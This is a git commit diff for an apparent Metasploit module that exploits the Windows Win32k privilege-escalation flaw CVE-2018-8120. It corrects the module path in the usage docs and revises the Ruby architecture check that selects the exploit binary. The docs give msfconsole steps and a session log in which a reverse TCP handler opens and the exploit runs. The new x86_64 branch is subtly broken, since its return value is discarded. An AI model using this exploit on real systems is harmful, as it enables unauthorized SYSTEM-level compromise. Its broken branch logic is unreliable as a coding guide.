updated doc, added x86_64 binary
parent
cdc2918c84
commit
a67122aaf7
Binary file not shown.
|
@ -15,7 +15,7 @@ The update addresses this vulnerability by correcting how Win32k handles objects
|
|||
|
||||
1. Start `msfconsole`
|
||||
2. Get a session
|
||||
3. `use exploit/windows/local/ms18_8120_win32k_privsec`
|
||||
3. `use exploit/windows/local/ms18_8120_win32k_privesc`
|
||||
4. `set SESSION [SESSION]`
|
||||
5. `set LHOST [LHOST]`
|
||||
6. `exploit`
|
||||
|
@ -33,12 +33,12 @@ meterpreter > getuid
|
|||
Server username: zero-PC\zero
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec
|
||||
msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1
|
||||
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc
|
||||
msf exploit(windows/local/ms18_8120_win32k_privesc) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102
|
||||
msf exploit(windows/local/ms18_8120_win32k_privesc) > set LHOST 192.168.1.102
|
||||
LHOST => 192.168.1.102
|
||||
msf exploit(windows/local/ms18_8120_win32k_privsec) > run
|
||||
msf exploit(windows/local/ms18_8120_win32k_privesc) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.102:4444
|
||||
[+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference
|
||||
|
|
|
@ -93,9 +93,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def check_arch
|
||||
sys_arch = sysinfo['Architecture']
|
||||
if sys_arch == ARCH_X86 || (sys_arch == ARCH_X64 && session.arch == ARCH_X86)
|
||||
if sys_arch == ARCH_X86
|
||||
fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
|
||||
|
||||
'CVE-2018-8120x86.exe'
|
||||
elsif sys_arch == ARCH_X64
|
||||
'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
|
||||
|
||||
'CVE-2018-8120x64.exe'
|
||||
else
|
||||
fail_with(Failure::BadConfig, "Invalid architecture")
|
||||
|
|
Loading…
Reference in New Issue